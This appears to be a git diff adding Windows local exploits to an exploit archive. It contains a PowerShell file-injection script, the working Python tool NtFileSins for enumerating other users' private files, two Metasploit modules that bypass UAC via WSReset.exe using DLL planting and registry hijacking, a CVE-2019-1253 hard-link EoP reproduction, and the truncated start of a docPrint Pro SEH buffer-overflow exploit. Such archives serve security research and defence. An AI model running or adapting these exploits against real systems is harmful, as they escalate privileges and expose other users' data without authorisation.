+      $filesystem = New-Object IO.FileSystemWatcher $folder, $filter -Property @{IncludeSubdirectories = $false;NotifyFilter =  [IO.NotifyFilters]'FileName, LastWrite'}
+
+      Register-ObjectEvent $filesystem Created -SourceIdentifier FileCreated -Action {
+          $path = $Event.SourceEventArgs.FullPath
+          "`nWrite-Host 'injected content'" | Out-File -Append -FilePath $path -Encoding utf8
+          Unregister-Event FileCreated
+      }
+ 
+<--script end-->
+
+##Timeline##
+
+16-06-2019 :: Issue found
+18-06-2019 :: security@ emailed requesting steps to disclose  
+30-06-2019 :: CERT contacted due to non response of vendor from official email address
+31-06-2019 :: CERT still unable to contact vendor
+07-07-2019 :: CERT makes contact with vendor. Discover security@ address is not monitored by vendor
+20-08-2019 :: Vendor confirms receipt of details
+27-08-2019 :: Email sent indicating intention to disclose due to lack of response
+02-09-2019 :: No response through CERT. Findings published
\ No newline at end of file
diff --git a/exploits/windows/local/47357.py b/exploits/windows/local/47357.py
new file mode 100755
index 000000000..445aaa345
--- /dev/null
+++ b/exploits/windows/local/47357.py
@@ -0,0 +1,458 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
+[+] ISR: ApparitionSec          
+ 
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows NTFS
+
+NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family.
+
+
+[Vulnerability Type]
+Privileged File Access Enumeration
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name.
+This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension
+or have a "." (dot) as part of the file or folder name.
+
+Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames
+of other users, maybe we need to locate files up front that we wish to steal possibly prior to launching say an XXE exploit to steal
+those files or maybe we just passively sniff the accounts directories to profile the mark and or learn their daily activities.
+
+Standard account users attempting to open another users files or folders that do not contain a valid extension or dot "." in its filename
+are always issued the expected "Access is denied" system error message.
+
+However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker friendly warning:
+"The system cannot find the file".
+
+This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file".
+
+Example, the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not.
+This helps protect users from having their local files known to attackers, since the system returns the same message regardless if files
+exist or not when using those commands. Those commands output messages are not affected by the file having a valid extension or not.
+
+However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible
+users file on the command line much like calling a program and pressing the enter key.
+
+After the Win32 API function CreateFile is called an it returns either:
+
+1) "The system cannot find the file"
+2) "Access is denied"
+
+C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact
+The system cannot find the file <==== DOES NOT EXIST
+
+C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact
+Access is denied.  <===== EXISTS
+
+C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con
+The system cannot find the file <==== DOES NOT EXIST
+
+C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever 
+Access is denied.  <===== FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME
+
+From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe 
+or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass.
+
+Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide
+processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is
+how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the
+malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights.
+
+Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd.
+However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages.
+
+Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing
+files or folders in the local file system.
+
+
+Tested successfully Win7/10
+
+
+[Exploit/POC]
+"NtFileSins.py"
+
+from subprocess import Popen, PIPE
+import sys,argparse,re
+
+# NtFileSins v2.1
+# Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet.
+# Fixed: save() logic to log report in case no Zone.Identifiers found.
+#
+# Windows File Enumeration Intel Gathering.
+# Standard users can prove existence of privileged user artifacts.
+#
+# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
+# when a file exists or doesn't exist, when restricted access is attempted by another user.
+#
+# However, accessing files directly by attempting to "open" them from cmd.exe shell,
+# we can determine existence by compare inconsistent Windows error messages.
+#
+# Requirements: 1) target users with >= privileges (not admin to admin).
+#               2) artifacts must contain a dot "." or returns false positives.
+#
+# Windows message "Access Denied" = Exists
+# Windows message "The system cannot find the file" = Not exists
+# Windows returns "no message"  OR  "c:\victim\artifact is not recognized as an internal or external command,
+# operable program or batch file" = Admin to Admin so this script is not required.
+#
+# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
+# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
+#
+#======================================================================#
+# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1   #
+# By John Page (aka hyp3rlinx)                                         #
+# Apparition Security                                                  #
+#======================================================================#
+
+BANNER='''
+    _   _______________ __    _____ _           
+   / | / /_  __/ ____(_) /__ / ___/(_)___  _____
+  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
+ / /|  / / / / __/ / / /  __/__/ / / / / (__  ) 
+/_/ |_/ /_/ /_/   /_/_/\___/____/_/_/ /_/____/  v2.1                                                                                     
+ By hyp3rlinx
+ ApparitionSec                                                                                                                     
+'''              
+
+sin_cnt=0
+internet_sin_cnt=0
+found_set=set()
+zone_set=set()
+ARTIFACTS_SET=set()
+ROOTDIR = "c:/Users/"
+ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
+
+USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
+           "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]
+
+APPDATA_DIR=["AppData/Local/Temp"]
+
+EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat",
+          ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])
+
+REPORT="NtFileSins_Log.txt"
+
+def usage():
+    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
+    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
+    print '-u victim -a "<name.ext>"'
+    print "-u victim -d Downloads -a <name.ext> -s"
+    print '-u victim -d Contacts -a "Mike N.contact"'
+    print "-u victim -a APT.txt -b -n"
+    print "-u victim -d -z Desktop/MyFiles -a  <.name>"
+    print "-u victim -d Searches -a <name>.search-ms"
+    print "-u victim -d . -a <name.ext>"
+    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
+    print "-u victim -d Downloads -a APT.exe -b"
+    print "-u victim -f list_of_files.txt"
+    print "-u victim -f list_of_files.txt -b -s"
+    print "-u victim -f list_of_files.txt -x .txt"
+    print "-u victim -d desktop -f list_of_files.txt -b"
+    print "-u victim -d desktop -f list_of_files.txt  -x .rar"
+    print "-u victim -z -s -f list_of_files.txt"
+
+def parse_args():
+    parser.add_argument("-u", "--user", help="Privileged user target")
+    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search <e.g. Downloads>.")
+    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
+    parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.")
+    parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.")
+    parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.")
+    parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.")
+    parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.")
+    parser.add_argument("-z", "--zone_identifier", nargs="?", const="1", help="Identifies artifacts downloaded from the internet by checking for Zone.Identifier:$DATA.")
+    parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT)
+    parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.")
+    parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.")
+    return parser.parse_args()
+
+
+def access(j):
+    result=""
+    try:
+        p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True)
+        stderr,stdout = p.communicate()
+        result = stdout.strip()
+    except Exception as e:
+        #print str(e)
+        pass
+    return result
+
+
+def artifacts_from_file(artifacts_file, bflag, specific_ext):
+    try:
+        f=open(artifacts_file, "r")
+        for a in f:
+            idx = a.rfind(".")
+            a = a.strip()
+            if a != "":
+                if specific_ext:
+                    if idx==-1:
+                        a = a + specific_ext
+                    else:
+                        #replace existing ext
+                        a = a[:idx] + specific_ext
+                if bflag:
+                    ARTIFACTS_SET.add(a)
+                else:
+                    ARTIFACTS_SET.add(a)
+        f.close()
+    except Exception as e:
+        print str(e)
+        exit()
+
+
+def save():
+    try:
+        f=open(REPORT, "w")
+        for j in found_set:
+            f.write(j+"\n")
+        f.close()
+    except Exception as e:
+        print str(e)
+
+
+def recon_msg(s):
+    if s == 0:
+        return "Access is denied."
+    else:
+        return "\t[*] Artifact exists ==>"
+
+
+def echo_results(args, res, x, i):
+    global sin_cnt
+    if res=="":
+        print "\t[!] No NTFS message, you must already be admin, then this script is not required."
+        exit()
+    if "not recognized as an internal or external command" in res:
+        print "\t[!] You must target users with higher privileges than yours."
+        exit()
+    if res != recon_msg(0):
+        if args.verbose:
+            print "\t"+res
+        else:
+            if args.notfound:
+                print "\t[-] not found: " + x +"/"+ i
+    else:
+        sin_cnt += 1
+        if args.save or args.zone_identifier:
+            found_set.add(x+"/"+i)
+        if args.verbose:
+            print recon_msg(1)+ x+"/"+i
+            print "\t"+res
+        else:
+            print recon_msg(1)+ x+"/"+i
+
+
+def valid_artifact_name(sin,args):
+    idx = "." in sin
+    if re.findall(r"[/\\*?:<>|]", sin):
+        print "\t[!] Skipping: disallowed file name character."
+        return False
+    if not idx and not args.built_in_ext and not args.specific_ext:
+        print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives."
+        print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives."
+    if not args.built_in_ext:
+        if sin[-1] == ".":
+            print "\t[!] Skipping: "+sin+" non valid file name."
+            return False
+    return True
+
+
+def search_missing_ext(path,args,i):
+    for x in path:
+        for e in EXTS:
+            res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
+            echo_results(args, res, x, i+e)
+
+
+#Check if the found artifact was downloaded from internet
+def zone_identifier_check(args):
+    
+    global ROOTDIR, internet_sin_cnt
+    zone_set.update(found_set)
+    
+    for c in found_set:
+        c = c + ZONE_IDENTIFIER
+        res = access(ROOTDIR+args.user+"/"+c)
+        if res == "Access is denied.":
+           internet_sin_cnt += 1
+           print "\t[$] Zone Identifier found: "+c+" this file was downloaded over the internet!."
+           zone_set.add(c)
+
+
+def ntsins(path,args,i):
+    if i.rfind(".")==-1:
+        search_missing_ext(path,args,i)
+        i=""
+    for x in path:
+        if i != "":
+            if args.built_in_ext:
+                for e in EXTS:
+                    res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
+                    echo_results(args, res, x, i+e)
+            elif args.specific_ext:
+                idx = i.rfind(".")
+                if idx == -1:
+                    i = i + "."
+                else:
+                    i = i[:idx] + args.specific_ext
+            res = access(ROOTDIR+args.user+"/"+x+"/"+i)
+            echo_results(args, res, x, i)
+            
+
+def search(args):
+    print "\tSearching...\n"
+    global ROOTDIR, USER_DIRS, ARTIFACTS_SET
+    
+    if args.artifact:
+        ARTIFACTS_SET = set([args.artifact])
+        
+    for i in ARTIFACTS_SET:
+        idx = i.rfind(".") + 1
+        if idx and args.built_in_ext:
+            i = i[:idx -1:None]
+        if len(i) > 0 and i != None: 
+            if valid_artifact_name(i,args):
+                #specific user dir search
+                if args.directory:
+                    single_dir=[args.directory]
+                    ntsins(single_dir,args,i)
+                #search appdata dirs
+                elif args.appdata:
+                    ntsins(APPDATA_DIR,args,i)
+                #all default user dirs
+                else:
+                    ntsins(USER_DIRS,args,i)
+        
+
+def check_dir_input(_dir):
+    if len(re.findall(r":", _dir)) != 0:
+        print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h."
+        return False
+    return True
+
+
+def main(args):
+
+    if len(sys.argv)==1:
+        parser.print_help(sys.stderr)
+        sys.exit(1)
+
+    if args.examples:
+        usage()
+        exit()
+
+    if not args.user:
+        print "[!] No target user specified see Help -h"
+        exit()
+
+    if args.appdata and args.directory:
+        print "[!] Multiple search directories supplied see Help -h"
+        exit()
+
+    if args.specific_ext:
+        if  "." not in args.specific_ext:
+            print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives."
+            exit()
+            
+    if args.artifact and args.artifacts_from_file:
+        print "[!] Multiple artifacts specified, use just -f or -a see Help -h"
+        exit()
+        
+    if args.built_in_ext and args.specific_ext:
+        print "\t[!] Both specific and built-in extensions supplied, use only one."
+        exit()
+
+    if args.specific_ext and not args.artifacts_from_file:
+        print "\t[!] -x to be used with -f flag only see Help -h."
+        exit()
+        
+    if args.artifact:
+        if args.artifact.rfind(".")==-1:
+            print "\t[!] Artifacts must contain a .ext or will result in false positives."
+            exit()
+            
+    if args.directory:
+        if not check_dir_input(args.directory):
+            exit()
+            
+    if args.artifacts_from_file:
+        artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext)
+
+    if not args.artifact and not args.artifacts_from_file:
+        print "[!] Exiting, no artifacts supplied see Help -h"
+        exit()
+    else:
+        search(args)
+
+    if sin_cnt >= 1 and args.zone_identifier:
+        zone_identifier_check(args)
+    
+    if args.save and len(found_set) != 0 and not args.zone_identifier:
+        save()
+        
+    if args.save and len(zone_set) != 0:
+        found_set.update(zone_set)
+        save()
+    
+    print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n"
+    
+    if args.zone_identifier and internet_sin_cnt >= 1:
+        print "\t"+str(internet_sin_cnt) + " of the sins were internet downloaded.\n"
+    
+    if not args.notfound:
+        print "\tuse -n to display unfound enumerated files."
+    if not args.built_in_ext:
+        print "\tfor extra search coverage try -b flag or targeted artifact search -a."
+    
+if __name__ == "__main__":
+    print BANNER
+    parser = argparse.ArgumentParser()
+    main(parse_args())
+
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=rm8kEbewqpI
+
+
+
+[Network Access]
+Remote/Local
+
+
+
+[Severity]
+Low
+
+
+[Disclosure Timeline]
+Vendor Notification: July 29, 2019
+MSRC "does not meet the bar for security servicing" : July 29, 2019
+September 5, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47377.rb b/exploits/windows/local/47377.rb
new file mode 100755
index 000000000..0637c1da0
--- /dev/null
+++ b/exploits/windows/local/47377.rb
@@ -0,0 +1,139 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+
+  def initialize(info = {})
+    super(
+      update_info( info,
+        'Name'          => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)',
+        'Description'   => %q{
+        This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool
+        is run with the "autoElevate" property set to true, however it can be moved to
+        a new Windows directory containing a space (C:\Windows \System32\) where, upon
+        execution, it will load our payload dll (propsys.dll).
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+          'ACTIVELabs', # discovery
+          'sailay1996', # poc
+          'timwr',      # metasploit module
+        ],
+        'Platform'      => ['win'],
+        'SessionTypes'  => ['meterpreter'],
+        'Targets'       => [[ 'Automatic', {} ]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'EXITFUNC'     => 'process',
+          'WfsDelay'     => 15
+        },
+        'DisclosureDate'  => 'Aug 22 2019',
+        'Notes'           =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
+        },
+        'References'    => [
+          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
+          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
+          ['URL', 'https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e'],
+        ],
+      )
+    )
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
+      return CheckCode::Appears
+    end
+    CheckCode::Safe
+  end
+
+  def exploit
+    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    end
+
+    # Make sure we have a sane payload configuration
+    if sysinfo['Architecture'] != payload.arch.first
+      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target')
+    end
+
+    check_permissions!
+
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    exploit_win_dir = "C:\\Windows \\"
+    exploit_dir = "C:\\Windows \\System32\\"
+    exploit_file = exploit_dir + "WSReset.exe"
+    unless exists? exploit_win_dir
+      print_status("Creating directory '#{exploit_win_dir}'...")
+      session.fs.dir.mkdir(exploit_win_dir)
+    end
+    unless exists? exploit_dir
+      print_status("Creating directory '#{exploit_dir}'...")
+      session.fs.dir.mkdir(exploit_dir)
+    end
+    unless exists? exploit_file
+      session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file)
+    end
+
+    payload_dll = "C:\\Windows \\System32\\propsys.dll"
+    print_status("Creating payload '#{payload_dll}'...")
+    payload = generate_payload_dll
+    write_file(payload_dll, payload)
+    print_status("Executing WSReset.exe...")
+    begin
+      session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, {'Hidden' => true})
+    rescue ::Exception => e
+      print_error(e.to_s)
+    end
+    print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!")
+  end
+
+  def check_permissions!
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    # Check if you are an admin
+    # is_in_admin_group can be nil, true, or false
+    print_status('UAC is Enabled, checking level...')
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47378.rb b/exploits/windows/local/47378.rb
new file mode 100755
index 000000000..fb2621c93
--- /dev/null
+++ b/exploits/windows/local/47378.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+
+  def initialize(info = {})
+    super(
+      update_info(info,
+        'Name'          => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry',
+        'Description'   => %q(
+        This module exploits a flaw in the WSReset.exe file associated with the Windows
+        Store.  This binary has autoelevate privs, and it will run a binary file
+        contained in a low-privilege registry location.  By placing a link to
+        the binary in the registry location, WSReset.exe will launch the binary as
+        a privileged user.
+        ),
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+          'ACTIVELabs',   # discovery
+          'sailay1996',   # poc
+          'bwatters-r7',  # metasploit module
+        ],
+        'Platform'      => ['win'],
+        'SessionTypes'  => ['meterpreter'],
+        'Targets'       => [[ 'Automatic', {} ]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay'     => 15
+        },
+        'DisclosureDate'  => 'Feb 19 2019',
+        'Notes'           =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
+        },
+        'References'    => [
+          ['URL', 'https://www.activecyber.us/activelabs/windows-uac-bypass'],
+          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
+          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
+        ]
+      )
+    )
+    register_options(
+      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
+    )
+
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    check_permissions!
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    # get directory locations straight
+    win_dir = session.sys.config.getenv('windir')
+    vprint_status("win_dir = " + win_dir)
+    tmp_dir = session.sys.config.getenv('tmp')
+    vprint_status("tmp_dir = " + tmp_dir)
+    exploit_dir = win_dir + "\\System32\\"
+    vprint_status("exploit_dir = " + exploit_dir)
+    reset_filepath = exploit_dir + "WSReset.exe"
+    vprint_status("exploit_file = " + reset_filepath)
+
+    # make payload
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
+    payload_pathname = tmp_dir + '\\' + payload_name
+    vprint_status("payload_pathname = " + payload_pathname)
+    vprint_status("Making Payload")
+    payload = generate_payload_exe
+    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
+    vprint_status("reg_command = " + reg_command)
+    registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
+
+
+    # make registry changes
+    vprint_status("Making Registry Changes")
+    begin
+      registry_createkey(registry_key)
+      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
+      registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
+    rescue ::Exception => e
+      print_error(e.to_s)
+    end
+    vprint_status("Registry Changes Complete")
+    # Upload payload
+    vprint_status("Uploading Payload to #{payload_pathname}")
+    write_file(payload_pathname, payload)
+    vprint_status("Payload Upload Complete")
+
+    vprint_status("Launching " + reset_filepath)
+    begin
+      session.sys.process.execute("cmd.exe /c \"#{reset_filepath}\"", nil, 'Hidden' => true)
+    rescue ::Exception => e
+      print_error(e.to_s)
+    end
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
+    # wait for a few seconds before cleaning up
+    sleep(20)
+    vprint_status("Removing Registry Changes")
+    registry_deletekey(registry_key)
+    vprint_status("Registry Changes Removed")
+  end
+
+  def check_permissions!
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    # Check if you are an admin
+    # is_in_admin_group can be nil, true, or false
+    print_status('UAC is Enabled, checking level...')
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47389.txt b/exploits/windows/local/47389.txt
new file mode 100644
index 000000000..2ff08627a
--- /dev/null
+++ b/exploits/windows/local/47389.txt
@@ -0,0 +1,53 @@
+#-----------------------------------------------------------------------------#
+# Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite (EoP) #
+# Date: Sep 4 2019                                                            #
+# Exploit Author: Gabor Seljan                                                #
+# Vendor Homepage: https://www.microsoft.com/                                 #
+# Version: 17763.1.amd64fre.rs5_release.180914-1434                           #
+# Tested on: Windows 10 Version 1809 for x64-based Systems                    #
+# CVE: CVE-2019-1253                                                          #
+#-----------------------------------------------------------------------------#
+
+Summary:
+
+AppXSvc improperly handles file hard links resulting in a low privileged user
+being able to take 'Full Control' of an arbitrary file leading to elevation of
+privilege.
+
+Description:
+
+An elevation of privilege vulnerability exists when the AppX Deployment Server
+(AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
+originally reported by Nabeel Ahmed, I have found that AppXSvc sometimes opens
+the settings.dat[.LOGx] files of Microsoft Edge for a restore operation that
+modifies the security descriptor of the files. Further analyzis revealed that
+the restore operation can be triggered on demand by preventing AppXSvc from
+accessing the settings.dat[.LOGx] files. This can be achieved by locking the
+settings.dat[.LOGx] file, resulting in 'Access Denied' and 'Sharing Violation'
+errors when Edge and AppXSvc are trying to access it. Eventually the restore
+operation kicks in and if the settings.dat[.LOGx] file has been replaced with
+a hard link AppXSvc will overwrite the security descriptor of the target file.
+A low privileged user can leverage this vulnerability to take 'Full Control'
+of an arbitrary file.
+
+Steps to reproduce:
+1. Terminate Edge.
+2. Create a hard link from settings.dat.LOG2 to C:\Windows\win.ini.
+3. Open the hard link for reading and lock the file.
+4. Start Edge and wait a few seconds for the restore operation to kick in.
+5. Unlock the file and close the file handle.
+
+Expected result:
+Full access (GENERIC_ALL) to C:\Windows\win.ini is denied.
+
+Observed result:
+C:\Windows\win.ini has had it's security descriptor rewritten to grant
+'Full Control' to the low privileged user.
+
+PoC files:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47389.zip
+
+References:
+https://github.com/sgabe/CVE-2019-1253
+https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1253
+https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
\ No newline at end of file
diff --git a/exploits/windows/local/47394.py b/exploits/windows/local/47394.py
new file mode 100755
index 000000000..764409837
--- /dev/null
+++ b/exploits/windows/local/47394.py
@@ -0,0 +1,114 @@
+import struct
+# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
+# Date: September 14th, 2019
+# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
+# Vendor Homepage: http://www.verypdf.com
+# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
+# Version: 8.0
+# Tested on: Windows 10 and Windows 7
+
+
+# TO RUN:
+# 1. Create a blank file named "test.pdf"
+# 2. Open doc2pdf_win.exe
+# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
+# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
+# 5. Click "Add File(s)"
+# 6. Select the "test.pdf" file created from step 1.
+# 7. Press on "Start" and name the file "exploit.pdf"
+
+# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)
+
+# Zero out registers for calculations.
